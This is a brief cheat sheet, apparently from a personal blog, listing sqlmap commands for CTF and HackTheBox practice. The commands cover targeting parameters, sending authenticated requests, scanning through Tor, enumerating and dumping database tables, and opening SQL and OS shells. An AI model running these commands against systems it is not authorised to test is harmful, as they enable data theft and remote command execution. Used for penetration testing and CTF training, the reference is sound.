sqlmap Cheatsheet

Quick writeup and cheat sheet for sqlmap, the automated SQLi and database takeover tool, to speed up HTB/CTFs.

Simple usage

sqlmap -u "$URL"

Set the target DBMS to MySQL

sqlmap -u "$URL" --dbms=mysql

Using a proxy

sqlmap -u "$URL" --proxy=http://proxy_address:port

Specify param1 to exploit

sqlmap -u "$URL?param1=value1&param2=value2" -p param1

Use POST requests

sqlmap -u "http://target_server" --data="param1=value1&param2=value2"

Access with authenticated session

sqlmap -u "http://target_server" --data="param1=value1&param2=value2" -p param1 --cookie='my_cookie_value'

Basic authentication

sqlmap -u "http://target_server" --data="param1=value1&param2=value2" -p param1 --auth-type=basic --auth-cred=username:password

Specify parameter to exploit

sqlmap --dbms=mysql -u "http://www.example.com/?param1=value1&param2=value2" --dbs -p param2

Specify parameter to exploit in ‘nice’ URIs

sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

Evaluating response strings

sqlmap -u "$URL" --string="This string if query is TRUE"
sqlmap -u "$URL" --not-string="This string if query is FALSE"

List databases

sqlmap -u "$URL" --dbs

List tables of database target_DB

sqlmap -u "$URL" -D target_DB --tables

Dump table target_Table of database target_DB

sqlmap -u "$URL" -D target_DB -T target_Table --dump

List columns of table target_Table of database target_DB

sqlmap -u "$URL" -D target_DB -T target_Table --columns

Scan through TOR

sqlmap -u "$URL" --tor --tor-type=SOCKS5

Get SQL Shell

sqlmap -u "$URL" --sql-shell

Get OS Shell

sqlmap -u "$URL" --os-shell

Written on August 25, 2022

